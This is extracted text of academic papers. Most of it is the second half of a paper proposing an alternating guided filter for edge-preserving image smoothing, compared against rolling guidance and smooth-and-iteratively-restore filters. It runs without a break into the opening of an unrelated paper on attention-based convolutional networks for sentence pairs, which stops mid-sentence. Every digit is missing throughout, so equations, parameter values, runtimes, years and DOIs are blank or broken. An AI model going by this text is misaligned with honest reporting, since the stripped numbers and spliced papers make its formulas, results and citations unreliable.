k∈ωiak and bi = |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. although the linear coefficients (ai,bi) vary spatially, their gradients will be smaller than those of g near strong edges (since they are the output of a mean filter). as a result we have ∇o≈a∇g, meaning that abrupt intensity changes in the guiding image g are still largely preserved in the output image o. equations ( ), ( ), and ( ) define the gf. when the input image also serves as the guidance image, the gf behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. equation ( ) can be rewritten as oi= ∑ j wij(g)ij ( ) with the weighting kernel wij depending only on the guidance image g: wij = |ω| ∑ k:(i,j)∈ωk ( + (gi−gk)(gj−gk) σ k +ε ) . ( ) since ∑ jwij(g)= this kernel is already normalized. the gf is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts (i.e., over sharpening of edges) of the blf. however, just like the blf, gf has the limitation that it tends to produce halos (unwanted blurring) near large scale edges (he, sun & tang, ). rolling guidance filter zhang et al. ( ) showed that the application of the joint bilateral filter (eq. ( )) in an iterative framework results in effective size selective filtering of small scale details combined with the recovery of larger scale edges. in their rolling guidance filter (rgf) framework the result gt+ of the tth iteration is obtained from the joint bilateral filtering of the input image i using the result gt of the previous iteration step as the guidance image: gt+ i = ki ∑ j∈� ij ·f (‖i−j‖)·g(‖g t i −g t j‖). ( ) in the rgf scheme details smaller than the gaussian kernel of the bilateral filter are initially removed while the edges of the remaining details are restored by iteratively updating the guidance image. at the start of the iteration process the term ‖gti −g t j‖ is almost zero, making the range filter g inoperative, so that the joint bilateral filter effectively behaves like a gaussian filter. details removed by this filter cannot be recovered later in the process. after each iteration step the influence of the range filter gradually increases due to its toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rolling guidance filter (rgf) algorithm (from zhang et al. ( )). input: input image i, σspatial, σrange, n iter output: output image o procedure: : initialize g as a constant image : for t := to n iter do : gt ← jointbilateralfilter(i,gt− ,σspatial,σrange) {input: i; guidance: gt− } : end for : o←gn iter increasing weights. hence, guided by the input image i, the rgf scheme gradually restores the edges that remain after the initial gaussian filtering. note that the initial guidance image g can simply be a constant (e.g., zero) valued image since it updates to the gaussian filtered input image in the first iteration step. the pseudocode for the rgf scheme is presented in table . the rgf scheme is not restricted to the jbf (zhang et al., ). any average-based joint edge aware averaging filter (e.g., the guided filter) can be applied in the rgf framework. in practice the rgf converges rapidly after only a few ( – ) iterations steps. the rgf scheme is simple to implement and can be efficiently computed. although the rgf enables effective and efficient size selective filtering, it has as drawback that the remaining large scale edges are smoothly curved. smooth and iteratively restore filter kniefacz & kropatsch ( ) recently introduced the smooth and iteratively restore (sir) filter. similar to rgf, sir initially removes small scale details (e.g., through gaussian filtering) and uses an edge-aware filter to iteratively restore larger scale edges. whereas rgf iteratively filters the (fixed) input image while iteratively restoring the initially blurred guidance image, sir does the opposite: it gradually restores the initially blurred image using the original input image as (fixed) guidance. thereto, small details are initially removed through blurring with a gaussian kernel: g i = k ∑ j∈� ij ·f (‖i−j‖). ( ) then, the edges of the remaining details are iteratively restored by repeatedly computing an updated image gt+ by joint bilateral filtering of the blurred image gt using the input image i as the guidance image: gt+ i = ki ∑ j∈� gtj ·f (‖i−j‖)·g(‖ii−ij‖). ( ) similar to rgf, sir converges rapidly after only a few ( – ) iterations steps. compared to rgf, sir has the advantage that it produces edges with articulated curvature, since it attempts to restore them as similar as possible to the edges in the original image. in contrast, the curvature of edges produced by rgf is smoothed (less articulated). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table smooth and iteratively restore with median filtering (sirmed) algorithm (adapted from kniefacz & kropatsch ( )). input: input image i, σspatial, σrange, n iter output: output image o procedure: : initialize g as a gaussian filtered version of the input image i : for t:= to niter do : gt ← jointbilateralfilter(gt− ,i,σspatial,σrange) {input: gt− ; guidance: i} : gt ←medianfilter(gt ) : end for : o←gn iter sir also has two drawbacks (kniefacz & kropatsch, ). first, the overall intensity of the result is less than the overall intensity of the original image, since sir restores edges starting from the initially blurred input image. rgf does not have this problem because it operates on the original image itself. second, sir tends to restore small scale details that are close to large scale edges. this is a result of a spill-over effect (blurring) of the large scale edges which enables the jbf (eq. ( )) to restore small scale details guided by the original input image. as will be shown in ‘relative performance of sir and sirmed’ this restoration of small details near larger edges by sir can effectively be suppressed by applying a median filter at the end of each iteration step with a kernel that is smaller than the gaussian kernel of the bilateral spatial filter (e.g., × ). at each iteration step the median filer ‘‘cleans’’ the image by removing small details that are recovered by the bilateral filter. in the rest of this paper, we will refer to this modification of the original sir algorithm as sirmed (smooth and iteratively restore including median filtering). the pseudocode for the sirmed algorithm is presented in table . the pseudocode for the sir algorithm is obtained by omitting step (the median filter). alternating guided filter in this section we propose a new filter scheme that effectively integrates the rgf and sir frameworks in such a way that it retains the desired effects of both earlier schemes (i.e., the elimination of small details and restoration of large scale edges) while eliminating their respective drawbacks (i.e., the smoothing of the curvature of large scale edges by rgf and the loss of local image intensity by sir). each iteration in the agf framework consists of three consecutive steps. first, joint bilateral filtering is applied to the input image i, using the result gt of the previous iteration step as the guidance image (eq. ( )). second, joint bilateral filtering is applied to the result from the first step, using the original image i as the guidance image (eq. ( )). third, a median filter with a small kernel size (e.g., × ) is applied to the result of the second step. the alternating use of the original image and the filtered result as either input or guidance images guarantees that both the overall image intensity (positive effect of the rgf scheme) and the curvature of the large scale edges (positive effect of the sir scheme) are preserved, while the integration of the median filter toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table alternating guided filter (agf) algorithm. input: input image i, σspatial, σrange, niter output: output image o procedure: : initialize g as a constant image : for t:= to n iter do : gt ← jointbilateralfilter(i,gt− ,σspatial,σrange) {input: i; guidance: gt− } : gt ← jointbilateralfilter(gt,i,σspatial,σrange) {input: gt ; guidance: i } : gt ←medianfilter(gt ) : end for : o←gn iter prevents the reintroduction of filtered small scale details near large scale edges (a negative side effect of sir). hence, the agf scheme combines the positive effects of both the rgf (intensity preservation) and sir (edge curvature preservation) while eliminating their negative side effects (edge curvature smoothing by the rgf scheme and contrast reduction plus the reintroduction of small details near larger edges by the sir scheme). the pseudo code for the agf scheme is presented in table . experimental results in this section we present the results of some experiments that were performed to study the performance of the proposed agf framework. we tested agf by applying it to a wide range of different natural images (for an overview of all results see the supplemental information with this paper). also, we compare the performance of agf with that of rgf and sirmed. the images used in this study have a width of pixels, and a height that varies between and pixels. we selected a set of test images with widely varying features and statistics, such as landscapes and aerial images, portraits and mosaics, embroidery and patchwork. the full set of test images with the results of the different filter schemes are provided as supplemental information. in this study, color images are processed by applying the different algorithms to each channel in rgb color space independently. this was done to enable straightforward comparison with the results from previous studies (kniefacz & kropatsch, ; zhang et al., ). note that in practical applications, filtering should preferably be performed in the cie-lab color space, so that only perceptually similar colors are averaged and only perceptually significant edges are preserved. as noted before, a bilateral filter (see eq. ( )) is controlled by two parameters: the size of the spatial filter kernel (σspatial) and that of the range filter kernel (σrange). except when stated otherwise, we used the same constant values for the spatial and range kernels in the bilateral filters that are included in all three frameworks investigated in this study (i.e., rgf, sirmed and agf): σspatial= and σrange= . . these values were empirically toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. figure effects of sir and sirmed filtering on image intensity. (a) input image (photo credit: adrian mendoza). (b, c) d image intensity distribution along a horizontal cross section of (a) (yellow line) after the first iterations of respectively sir and sirmed. the lowest curves show the original intensity distribution in (a). (d, e) results after iterations of respectively sir and sirmed. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . determined and resulted in an effective performance for all three frameworks on the entire set of selected test images. relative performance of sir and sirmed figures and illustrate the effect of including a median filter with a kernel size of × at the end of each iteration step in the sir framework (see table ). figure shows the original input image (a) with the result of respectively sir (fig. d) and sirmed (fig. e) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of sir and sirmed filtering on image intensity. (a) input image. (b, c) d image in- tensity distribution along a horizontal cross section of (a) (yellow line) after the first iterations of re- spectively sir and sirmed. the lowest curves show the original intensity distribution in (a). (d, e) re- sults after iterations of respectively sir and sirmed. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . after iterations. in addition, this figure also shows the d image intensity distribution along a horizontal cross section of the input image (yellow line in fig. a) after each of the first iterations of both sir (fig. c) and sirmed (fig. d). the lowest curves represent the original intensity distribution (fig. a). comparison of figs. d and e shows that sirmed effectively removes small details all over the image, while sir reintroduces small details near large scale edges (notice for instance the light poles all over the stadium, that are restored in fig. d but are nicely removed in fig. e). a comparison of figs. b and c toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure results of rgf, sirmed and agf filtering for the first iteration steps. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . left. (photo credit: adrian mendoza). shows that sir indeed restores high frequency details near large edge discontinuities, while sirmed restores these large scale edges without the reintroduction of small scale details. this effect is also clearly demonstrated in fig. , where sir fails to remove the small scale details all around the outlines of the tentacles and the fishes, while sirmed effectively filters small elements all around these larger objects while both preserving their outlines and smoothing their interior. relative performance of rgf, sirmed and agf figure shows the results of rgf, sirmed and agf filtering after the first iteration steps. notice that all three filter schemes iteratively restore large scale image edges proceeding from an initial low resolution version of the input image. in this process rgf gradually smoothes the curvature of the large scale edges, while sirmed smoothes the overall image intensity resulting in a global contrast reduction. in contrast, agf restores the large scale edges without smoothing their curvature and with preservation of local image contrast. figures b– d illustrate these effects by showing d horizontal cross sections. the contrast reducing effect of sir is clearly shown in fig. c as an overall reduction of the height of the large scale peaks. comparison of figs. e and g illustrates that rgf smoothes the curvature of large scale edges while agf preserves edge curvature. figure shows the details that are removed by filtering with respectively rgf (fig. b), sirmed (fig. c) and agf (fig. d) after iterations, together with the original input image (fig. a). these images are obtained by subtracting the original image from the filtered ones and computing the mean of the absolute value across the three color channels. this example illustrates that each of the three filters removes small scale details while preserving the larger scale edges to a certain extent. note that agf removes small image toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of rgf, sirmed and agf filtering. (a) input image (photo credit: adrian men- doza). (b–d) d image intensity distribution along a horizontal cross section (yellow line in (a)) after successive iterations. (e–g) results after iteration steps. the spatial and range kernels used in the bilat- eral filters for this example were respectively σspatial = and σrange = . . details all over the image support, while the original large scale edges (e.g., the outlines of the temple) remain relatively unaffected. in contrast, both rgf and sirmed significantly alter the articulation of the original large scale edges. rgf smoothes the local edge curvature while sirmed affects the local mean image intensity (resulting in local contrast reduction). as a result, large scale image contours (e.g., the outlines of the temple) are clearly visible in figs. b and c, and much less pronounced in fig. d. figure further illustrates the differential performance of all four filters investigated here (agf, rgf, sir, and sirmed) on an artificial image with noise. figure a shows some simple geometric shapes (cross, triangle, square and wheel) with different sizes on a step-edge background with % additional gaussian noise. figures b– e show the results of respectively agf, rgf, sir and sirmed filtering of fig. a after five iteration steps. this example shows that sir restores noise near the edges of larger details and along the vertical step edge in the background, while agf, rgf and sirmed effectively reduce noise all over the image plane. also, rgf (fig. c) smoothes edge curvature, in contrast to agf, sir and sirmed which retain the original edge curvature. this can for instance be seen in fig. c where the sharp edges of the crosses, the corners of the triangles and squares, and the spokes of the wheels are all rounded after filtering. this example also illustrates that both sir (fig. d) and sirmed (fig. e) effectively reduce image contrast due to the toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the elimination of small scale details by rgf, sirmed and agf filtering. absolute difference between input image (a) and the results of respectively rgf (b), sirmed (c) and agf (d) after itera- tions. the images have been enhanced for visual display. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . intensity smoothing that is inherent in this method. agf does not introduce any halos. in contrast, rgf produces high intensity halos, and sir and sirmed both produce halos with a large spatial extent (see fig. c near the crosses and wheels). effects of different parameter settings the results of rgf, sirmed and agf for different values of the parameters σs and σr are shown in figs. – . in these figures rows correspond to different amounts of domain filtering (i.e., different values of σs) and columns to different amounts of range filtering (i.e., different values of σr). these figures show that large spatial kernels and large range kernels both result in blurred image representations. large spatial kernels cause averaging over large image areas, while large range kernels cause averaging over a wider range of image values. in rgf (fig. ) the smoothing of large scale edge curvature increases with increasing σs. this effect can for instance clearly be seen in the first column of fig. (for σr = . ) where the curves in the roof of the temple just above the pillars are still visible for σs= , reduced for σs= and removed for σs= . in sirmed (fig. ) the reduction of local image contrast increases with increasing σs. this effect can for instance clearly be seen in the first column of fig. (for σr = . ) where toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of agf, rgf, sir and sirmed filtering. (a) artificial input image with % gaussian noise added. results of (b) agf, (c) rgf, (d) sir and (e) sirmed filtering after iteration steps. the spatial and range kernels used in the bilateral filters for this example were respectively σspatial = and σrange = . . the contrast in the background vegetation around the temple is still visible for σs = , reduced for σs= and almost removed for σs= . figure shows the effects of different parameter settings on the performance of the proposed agf framework. in contrast to rgf, agf preserves large scale edge curvature, as can be seen in the first column of fig. (for σr = . ). notice that the curves in the roof of the temple just above the pillars remain unaffected, even for the largest size of the spatial kernel (σs= ). in contrast to sirmed, agf also preserves local image intensity (contrast). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the effects of different parameter settings on rgf filtering. results of rgf filtering of the in- put image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. figure the effects of different parameter settings on sirmed filtering. results of sirmed filtering of the input image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. runtime evaluation in this study we used a matlab implementation of the rgf written by zhang et al. ( ) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/projects/ rollguidance). the jbf, which is part of this code, is also used here to implement both the sir filter (see ‘bilateral filter’) and the agf filter (see ‘alternating guided filter’). we toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/ . /peerj-cs. figure the effects of different parameter settings on agf filtering. results of agf filtering of the in- put image for different values of the variances of the spatial (σs = , and ) and range (σr = . , . and . ) filters. made no effort to optimize the code of the algorithms. we conducted a runtime test on a dell latitude laptop with an intel i ghz cpu and gb memory. the algorithms were implemented in matlab a. only a single thread was used without involving any simd instructions. for this test we used a set of natural rgb images (also provided in the supplemental information with this paper). the spatial and range kernels used in the bilateral filters for this test were fixed at respectively σspatial= and σrange= . , and the number of iterations was set to . the mean runtimes for agf, rgf, sir and sirmed were respectively . ± . , . ± . , . ± . and . ± . s. this shows that the mean runtime of agf is about equal to the sum of the runtimes of rgf and sirmed. this result is as expected, since the steps involved in agf are a combination of the steps involved in both rgf and sirmed. conclusions in this paper we presented the new edge-preserving alternating guided filter (agf) smoothing filter that eliminates small scale image details while preserving both the articulation and curvature of large scale edges and local mean image intensity. the agf framework integrates the recently introduced rgf and (a slightly adapted version of) sir filters in an alternating iterative scheme. agf combines the large scale edge and local intensity preserving image smoothing properties of the rgf with the large scale edge restoring properties of the sir. however, it does not suffer from the drawbacks of both of its components: the curvature smoothing of large scale edges by rgf and the local intensity reduction and restoration of small scale details near large scale edges by sir. the agf is simple to implement and efficient. application to a wide range of images has shown that agf consistently produces high-quality results. possible applications areas for agf are for toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. instance detail enhancement, denoising, edge extraction, jpeg artifact removal, multi-scale structure decomposition, saliency detection etc. (see e.g., he, sun & tang, ; kniefacz & kropatsch, ; zhang et al., ). additional information and declarations funding this work was supported by the air force office of scientific research, air force material command, usaf, under grant number fa - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: air force office of scientific research, air force material command, usaf: fa - - - . competing interests the author declares there are no competing interests. author contributions • alexander toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as supplemental dataset. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references black mj, sapiro g, marimont dh, heeger d. . robust anisotropic diffusion. ieee transactions on image processing ( ): – doi . / . . farbman z, fattal r, lischinski d, szeliski r. . edge-preserving decompositions for multi-scale tone and detail manipulation. acm transactions on graphics ( ): article doi . / . . he k, sun j, tang x. . guided image filtering. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . kniefacz p, kropatsch w. . smooth and iteratively restore: a simple and fast edge-preserving smoothing model. in: hegenbart s, kwitt r, uhl a, eds. proceedings toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. of the th annual workshop of the austrian association for pattern recognition (oagm ). – . eprint arxiv: . . paris s, durand f. . a fast approximation of the bilateral filter using a signal processing approach. in: leonardis a, bischof h, pinz a, eds. proceedings of the th european conference on computer vision (eccv ), part iv . berlin, heidelberg: springer berlin heidelberg, – . perona p, malik j. . scale-space and edge detection using anisotropic diffusion. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . petschnigg g, agrawala m, hoppe h, szeliski r, cohen m, toyama k. . digital photography with flash and no-flash image pairs. in: acm transactions on graphics (proceedings of siggraph ). new york: acm press, – . tomasi c, manduchi r. . bilateral filtering for gray and color images. in: proceedings of the ieee sixth international conference on computer vision. piscataway: ieee, – . zhang q, shen x, xu l, jia j. . rolling guidance filter. in: fleet d, pajdla t, schiele b, tuytelaars t, eds. computer vision—eccv : th european conference, part iii. cham: springer international publishing, – . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. abcnn: attention-based convolutional neural network for modeling sentence pairs wenpeng yin, hinrich schütze center for information and language processing lmu munich, germany wenpeng@cis.lmu.de bing xiang, bowen zhou ibm watson yorktown heights, ny, usa bingxia,zhou@us.ibm.com abstract how to model a pair of sentences is a critical issue in many nlp tasks such as answer selec- tion (as), paraphrase identification (pi) and textual entailment (te). most prior work (i) deals with one individual task by fine-tuning a specific system; (ii) models each sentence’s representation separately, rarely considering the impact of the other sentence; or (iii) re- lies fully on manually designed, task-specific linguistic features. this work presents a gen- eral attention based convolutional neural network (abcnn) for modeling a pair of sentences. we make three contributions. (i) the abcnn can be applied to a wide va- riety of tasks that require modeling of sen- tence pairs. (ii) we propose three attention schemes that integrate mutual influence be- tween sentences into cnns; thus, the rep- resentation of each sentence takes into con- sideration its counterpart. these interdepen- dent sentence pair representations are more powerful than isolated sentence representa- tions. (iii) abcnns achieve state-of-the-art performance on as, pi and te tasks. we release code at: https://github.com/ yinwenpeng/answer_selection. introduction how to model a pair of sentences is a critical is- sue in many nlp tasks such as answer selection (as) (yu et al., ; feng et al., ), paraphrase identification (pi) (madnani et al., ; yin and schütze, a), textual entailment (te) (marelli et al., a; bowman et al., a) etc. a s s how much did waterboy gross? s+ the movie earned $ . million s− this was jerry reed’s final film appearance p i s she struck a deal with rh to pen a book today s+ she signed a contract with rh to write a book s− she denied today that she struck a deal with rh t e s an ice skating rink placed outdoors is full of people s+ a lot of people are in an ice skating park s− an ice skating rink placed indoors is full of people figure : positive (<s , s + >) and negative (<s , s − >) examples for as, pi and te tasks. rh = random house most prior work derives each sentence’s represen- tation separately, rarely considering the impact of the other sentence. this neglects the mutual influ- ence of the two sentences in the context of the task. it also contradicts what humans do when comparing two sentences. we usually focus on key parts of one sentence by extracting parts from the other sentence that are related by identity, synonymy, antonymy and other relations. thus, human beings model the two sentences together, using the content of one sen- tence to guide the representation of the other. figure demonstrates that each sentence of a pair partially determines which parts of the other sen- tence we must focus on. for as, correctly answer- ing s requires attention on “gross”: s + contains a corresponding unit (“earned”) while s− does not. for pi, focus should be removed from “today” to correctly recognize < s , s + > as paraphrases and < s , s − > as non-paraphrases. for te, we need to focus on “full of people” (to recognize te for <s , s + >) and on “outdoors” / “indoors” (to recog- nize non-te for < s , s − >). these examples show the need for an architecture that computes different representations of si for different s −i (i ∈{ , }). https://github.com/yinwenpeng/answer_selection https://github.com/yinwenpeng/answer_selection convolutional neural networks (cnns) (lecun et al., ) are widely used to model sentences (kalchbrenner et al., ; kim, ) and sen- tence pairs (socher et al., ; yin and schütze, a), especially in classification tasks. cnns are supposed to be good at extracting robust and abstract features of input. this work presents the abcnn, an attention-based convolutional neural network, that has a powerful mechanism for mod- eling a sentence pair by taking into account the interdependence between the two sentences. the abcnn is a general architecture that can handle a wide variety of sentence pair modeling tasks. some prior work proposes simple mechanisms that can be interpreted as controlling varying atten- tion; e.g., yih et al. ( ) employ word alignment to match related parts of the two sentences. in con- trast, our attention scheme based on cnns models relatedness between two parts fully automatically. moreover, attention at multiple levels of granularity, not only at word level, is achieved as we stack mul- tiple convolution layers that increase abstraction. prior work on attention in deep learning (dl) mostly addresses long short-term memory networks (lstms) (hochreiter and schmidhuber, ). lstms achieve attention usually in a word-to-word scheme, and word representations mostly encode the whole context within the sentence (bahdanau et al., ; rocktäschel et al., ). it is not clear whether this is the best strategy; e.g., in the as ex- ample in figure , it is possible to determine that “how much” in s matches “$ . million” in s without taking the entire sentence contexts into ac- count. this observation was also investigated by yao et al. ( b) where an information retrieval system retrieves sentences with tokens labeled as date by named entity recognition or as cd by pos tagging if there is a “when” question. however, la- bels or pos tags require extra tools. cnns benefit from incorporating attention into representations of local phrases detected by filters; in contrast, lstms encode the whole context to form attention-based word representations – a strategy that is more com- plex than the cnn strategy and (as our experiments suggest) performs less well for some tasks. apart from these differences, it is clear that atten- tion has as much potential for cnns as it does for lstms. as far as we know, this is the first nlp paper that incorporates attention into cnns. our abcnns get state-of-the-art in as and te tasks, and competitive performance in pi, then obtains fur- ther improvements over all three tasks when linguis- tic features are used. related work non-dl on sentence pair modeling. sentence pair modeling has attracted lots of attention in the past decades. many tasks can be reduced to a se- mantic text matching problem. in this paper, we adopt the arguments by yih et al. ( ) who ar- gue against shallow approaches as well as against semantic text matching approaches that can be com- putationally expensive: due to the variety of word choices and inherent ambiguities in natural lan- guage, bag-of-word approaches with sim- ple surface-form word matching tend to produce brittle results with poor predic- tion accuracy (bilotti et al., ). as a result, researchers put more emphasis on exploiting syntactic and semantic struc- ture. representative examples include methods based on deeper semantic anal- ysis (shen and lapata, ; moldovan et al., ), tree edit-distance (punyakanok et al., ; heilman and smith, ) and quasi-synchronous grammars (wang et al., ) that match the dependency parse trees of the two sentences. instead of focusing on the high-level semantic rep- resentation, yih et al. ( ) turn their attention to improving the shallow semantic component, lexical semantics, by performing semantic matching based on a latent word-alignment structure (cf. chang et al. ( )). lai and hockenmaier ( ) explore finer- grained word overlap and alignment between two sentences using negation, hypernym, synonym and antonym relations. yao et al. ( a) extend word- to-word alignment to phrase-to-phrase alignment by a semi-markov crf. however, such approaches of- ten require more computational resources. in ad- dition, employing syntactic or semantic parsers – which produce errors on many sentences – to find the best match between the structured representa- tions of two sentences is not trivial. dl on sentence pair modeling. to address some of the challenges of non-dl work, much re- cent work uses neural networks to model sentence pairs for as, pi and te. for as, yu et al. ( ) present a bigram cnn to model question and answer candidates. yang et al. ( ) extend this method and get state-of-the-art performance on the wikiqa dataset (section . ). feng et al. ( ) test various setups of a bi-cnn ar- chitecture on an insurance domain qa dataset. tan et al. ( ) explore bidirectional lstms on the same dataset. our approach is different because we do not model the sentences by two independent neu- ral networks in parallel, but instead as an interdepen- dent sentence pair, using attention. for pi, blacoe and lapata ( ) form sentence representations by summing up word embeddings. socher et al. ( ) use recursive autoencoders (raes) to model representations of local phrases in sentences, then pool similarity values of phrases from the two sentences as features for binary classi- fication. yin and schütze ( a) similarly replace an rae with a cnn. in all three papers, the rep- resentation of one sentence is not influenced by the other – in contrast to our attention-based model. for te, bowman et al. ( b) use recursive neu- ral networks to encode entailment on sick (marelli et al., b). rocktäschel et al. ( ) present an attention-based lstm for the stanford natural lan- guage inference corpus (bowman et al., a). our system is the first cnn-based work on te. some prior work aims to solve a general sen- tence matching problem. hu et al. ( ) present two cnn architectures, arc-i and arc-ii, for sen- tence matching. arc-i focuses on sentence repre- sentation learning while arc-ii focuses on match- ing features on phrase level. both systems were tested on pi, sentence completion (sc) and tweet- response matching. yin and schütze ( b) pro- pose the multigrancnn architecture to model gen- eral sentence matching based on phrase matching on multiple levels of granularity and get promising re- sults for pi and sc. wan et al. ( ) try to match two sentences in as and sc by multiple sentence representations, each coming from the local repre- sentations of two lstms. our work is the first one to investigate attention for the general sentence matching task. attention-based dl in non-nlp domains. even though there is little if any work on atten- tion mechanisms in cnns for nlp, attention-based cnns have been used in computer vision for visual question answering (chen et al., ), image clas- sification (xiao et al., ), caption generation (xu et al., ), image segmentation (hong et al., ) and object localization (cao et al., ). mnih et al. ( ) apply attention in recurrent neural networks (rnns) to extract “information from an image or video by adaptively selecting a sequence of regions or locations and only process- ing the selected regions at high resolution.” gre- gor et al. ( ) combine a spatial attention mech- anism with rnns for image generation. ba et al. ( ) investigate attention-based rnns for recog- nizing multiple objects in images. chorowski et al. ( ) and chorowski et al. ( ) use attention in rnns for speech recognition. attention-based dl in nlp. attention-based dl systems have been applied to nlp after their success in computer vision and speech recognition. they mainly rely on rnns and end-to-end encoder- decoders for tasks such as machine translation (bah- danau et al., ; luong et al., ) and text re- construction (li et al., ; rush et al., ). our work takes the lead in exploring attention mecha- nisms in cnns for nlp tasks. bcnn: basic bi-cnn we now introduce our basic (non-attention) cnn that is based on the siamese architecture (brom- ley et al., ), i.e., it consists of two weight- sharing cnns, each processing one of the two sen- tences, and a final layer that solves the sentence pair task. see figure . we refer to this architecture as the bcnn. the next section will then introduce the abcnn, an attention architecture that extends the bcnn. table gives our notational conventions. in our implementation and also in the mathemat- ical formalization of the model given below, we pad the two sentences to have the same length s = max(s , s ). however, in the figures we show dif- ferent lengths because this gives a better intuition of how the model works. we now describe the bcnn’s four types of lay- ers: input, convolution, average pooling and output. symbol description s, s , s sentence or sentence length v word w filter width di dimensionality of input to layer i + w weight matrix table : notation figure : bcnn: abcnn without attention input layer. in the example in the figure, the two input sentences have and words, respectively. each word is represented as a d -dimensional pre- computed word vec (mikolov et al., ) embed- ding, d = . as a result, each sentence is repre- sented as a feature map of dimension d ×s. convolution layer. let v , v , . . . , vs be the words of a sentence and ci ∈ rw·d , < i < s + w, the concatenated embeddings of vi−w+ , . . . , vi where embeddings for vj are set to zero when j < or j > s. we then generate the representation pi ∈ rd for the phrase vi−w+ , . . . , vi using the convolution weights w ∈ rd ×wd as follows: pi = tanh(w ·ci + b) where b ∈ rd is the bias. average pooling layer. pooling (including min, max, average pooling) is commonly used to extract robust features from convolution. in this paper, we introduce attention weighting as an alternative, but use average pooling as a baseline as follows. for the output feature map of the last convolu- tion layer, we do column-wise averaging over all columns, denoted as all-ap. this generates a rep- resentation vector for each of the two sentences, shown as the top “average pooling (all-ap)” layer below “logistic regression” in figure . these two vectors are the basis for the sentence pair decision. for the output feature map of non-final convolu- tion layers, we do column-wise averaging over win- dows of w consecutive columns, denoted as w-ap; shown as the lower “average pooling (w-ap)” layer in figure . for filter width w, a convolution layer transforms an input feature map of s columns into a new feature map of s + w − columns; average pooling transforms this back to s columns. this ar- chitecture supports stacking an arbitrary number of convolution-pooling blocks to extract increasingly abstract features. input features to the bottom layer are words, input features to the next layer are short phrases and so on. each level generates more ab- stract features of higher granularity. the last layer is an output layer, chosen accord- ing to the task; e.g., for binary classification tasks, this layer is logistic regression (see figure ). other types of output layers are introduced below. we found that in most cases, performance is boosted if we provide the output of all pooling lay- ers as input to the output layer. for each non-final average pooling layer, we perform w-ap (pooling over windows of w columns) as described above, but we also perform all-ap (pooling over all columns) and forward the result to the output layer. this improves performance because representations from different layers cover the properties of the sentences at different levels of abstraction and all of these lev- els can be important for a particular sentence pair. abcnn: attention-based bcnn we now describe three architectures based on the bcnn, the abcnn- , the abcnn- and the abcnn- , that each introduces an attention mech- anism for modeling sentence pairs; see figure . abcnn- . the abcnn- (figure (a)) em- ploys an attention feature matrix a to influence con- (a) one block in abcnn- (b) one block in abcnn- (c) one block in abcnn- figure : three abcnn architectures volution. attention features are intended to weight those units of si more highly in convolution that are relevant to a unit of s −i (i ∈ { , }); we use the term “unit” here to refer to words on the lowest level and to phrases on higher levels of the network. fig- ure (a) shows two unit representation feature maps in red: this part of the abcnn- is the same as in the bcnn (see figure ). each column is the representation of a unit, a word on the lowest level and a phrase on higher levels. we first describe the attention feature matrix a informally (layer “conv input”, middle column, in figure (a)). a is gener- ated by matching units of the left representation fea- ture map with units of the right representation fea- ture map such that the attention values of row i in a denote the attention distribution of the i-th unit of s with respect to s , and the attention values of col- umn j in a denote the attention distribution of the j-th unit of s with respect to s . a can be viewed as a new feature map of s (resp. s ) in row (resp. col- umn) direction because each row (resp. column) is a new feature vector of a unit in s (resp. s ). thus, it makes sense to combine this new feature map with the representation feature maps and use both as in- put to the convolution operation. we achieve this by transforming a into the two blue matrices in figure (a) that have the same format as the representation feature maps. as a result, the new input of convolu- tion has two feature maps for each 